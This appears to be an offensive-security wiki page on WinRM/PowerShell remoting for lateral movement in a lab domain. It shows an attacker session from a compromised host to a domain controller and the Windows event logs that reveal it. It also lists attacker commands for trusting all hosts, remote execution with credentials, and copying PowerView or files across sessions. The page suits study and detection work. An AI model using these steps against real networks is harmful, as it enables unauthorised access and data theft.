WinRM for Lateral Movement
PowerShell remoting for lateral movement.

Execution

Attacker establishing a PSRemoting session from a compromised system 10.0.0.2 to a domain controller dc-mantvydas at 10.0.0.6:
1
New-PSSession -ComputerName dc-mantvydas -Credential (Get-Credential)
2
3
Id Name ComputerName ComputerType State ConfigurationName Availability
4
-- ---- ------------ ------------ ----- ----------------- ------------
5
1 Session1 dc-mantvydas RemoteMachine Opened Microsoft.PowerShell Available
6
7
PS C:\Users\mantvydas> Enter-PSSession 1
8
[dc-mantvydas]: PS C:\Users\spotless\Documents> calc.exe
Copied!

Observations

Note the process ancestry:
On the host that initiated the connection, a 4648 logon attempt is logged, showing what process initiated it, the hostname where it connected to and which account was used:
The below graphic shows that the logon events 4648 annd 4624 are being logged on both the system that initiated the connection (pc-mantvydas - 4648) and the system that it logged on to (dc-mantvydas - 4624):
Additionally, %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx on the host that initiated connection to the remote host, logs some interesting data for a task WSMan Session initialize :
1
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
2
- <System>
3
<Provider Name="Microsoft-Windows-WinRM" Guid="{A7975C8F-AC13-49F1-87DA-5A984A4AB417}" />
4
<EventID>6</EventID>
5
<Version>0</Version>
6
<Level>4</Level>
7
<Task>3</Task>
8
<Opcode>1</Opcode>
9
<Keywords>0x4000000000000002</Keywords>
10
11
# connection iniation time
12
<TimeCreated SystemTime="2018-07-25T21:13:36.511895800Z" />
13
<EventRecordID>673</EventRecordID>
14
15
# a unique connection ID
16
<Correlation ActivityID="{037F878B-8DF6-4F1A-BA51-432C3CDDCB47}" />
17
18
# process ID that initiated the connection
19
<Execution ProcessID="3172" ThreadID="2844" />
20
<Channel>Microsoft-Windows-WinRM/Operational</Channel>
21
<Computer>PC-MANTVYDAS.offense.local</Computer>
22
<Security UserID="S-1-5-21-1731862936-2585581443-184968265-1001" />
23
</System>
24
- <EventData>
25
26
# remote host the connection was initiated to
27
<Data Name="connection">dc-mantvydas/wsman?PSVersion=5.1.14409.1005</Data>
28
</EventData>
29
</Event>
Copied!
...same as above just in the actual screenshot:
Since we entered into a PS Shell on the remote system (Enter-PSSession) , there is another interesting log showing the establishment of a remote shell - note that the ShellID corresponds to the earlier observed Correlation ActivityID:

Additional Useful Commands

Jules Adriaens reached out to me and suggested to add the following useful commands, so here they are:
1
# Enable PowerShell Remoting on the target (box needs to be compromised first)
2
Enable-PSRemoting -force
3
4
# Check if a given system is listening on WinRM port
5
Test-NetConnection <IP> -CommonTCPPort WINRM
6
7
# Trust all hosts:
8
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
9
10
# Check what hosts are trusted
11
Get-Item WSMan:\localhost\Client\TrustedHosts
12
13
# Execute command on remote host
14
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname}
15
16
# Interactive session with explicit credentials
17
Enter-PSSession <host> -Credential <domain>\<user>
18
19
# Interactive session using Kerberos:
20
Enter-PSSession <host> -Authentication Kerberos
21
22
# Upload file to remote session
23
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)
24
25
# Download file from remote session
26
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)
Copied!

References

A look under the hood at Powershell Remoting through a cross plaform lens — Hurry Up and Wait!
Hurry Up and Wait!
Remote Services: Windows Remote Management, Sub-technique T1021.006 - Enterprise | MITRE ATT&CK®
Last modified 2yr ago